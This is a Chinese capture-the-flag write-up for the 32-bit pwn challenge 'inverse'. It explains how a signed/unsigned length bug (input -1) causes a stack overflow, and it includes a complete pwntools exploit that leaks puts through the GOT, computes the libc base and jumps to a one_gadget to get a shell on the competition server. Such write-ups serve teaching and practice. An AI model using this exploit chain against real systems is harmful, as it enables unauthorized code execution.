HWS-CTF-第七期山大站-inverse

第一次真正意义上独立在比赛中做出题目来了，距离真正意义接触CTF-PWN差不多正好两个月。但由于不知道靶场要自己开而且端口每次自己打开会改，交flag稍微晚了些（我太菜了）

inverse

main

work

这里很明显发现符号转换的bug，即nbytes对应有符号数为-1时可以造成溢出

read_int

将输入的字符转换为int类型（字符为负数也会转换）

read_n

往字符数组输入字符

思路

onegadget

ROPgadget

首先patchelf换库
然后通过输入字符-1使得绕过检查，随后-1对应0xffffffff(32位)，再次read时造成溢出，构造payload，先将返回地址覆盖为puts函数的地址，然后下一个为work函数的地址（puts的返回地址），然后是puts的参数，为puts的got表的地址，然后第一次work造成puts地址泄露，（先通过one_gadget找到可用的gadget，最后选择0x6749f的，因为esi一般都是符合其要求的，然后eax比较好找对应的gadget，如上图）从而得到libc基地址，然后第二次work时同样输入字符-1，随后将返回地址覆盖为pop eax；ret的gadget的地址，然后是0，最后是onegadget的地址，最后成功getshell

exp

from pwn import*
#context(os="linux",arch="i386",log_level="debug")
s=remote("124.71.135.126",30043)
#s=process("./pwn")
f=ELF("./pwn")
libc=ELF("./libc-2.27.so")
#gdb.attach(s,"b main")
s.recvuntil(b"input world tag: ")
s.sendline(b"1")
s.sendline(b"-1")
s.recvuntil(b"leave me a msg:")
payload=b"a"*64+p32(f.sym["puts"])+p32(f.sym["work"])+p32(f.got["puts"])
#+f.got["puts"]
s.sendline(payload)
put_addr=u32(s.recvline()[0:4])
libc_base=put_addr-libc.sym["puts"]

system_addr=libc_base+0x6749f 
payload=b"a"*64+p32(0x00024d37+libc_base)+p32(0)+p32(system_addr)
s.sendline(b"-1")
s.recvuntil(b"leave me a msg:")

s.sendline(payload)
# print(hex(u32(put_addr)))
s.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25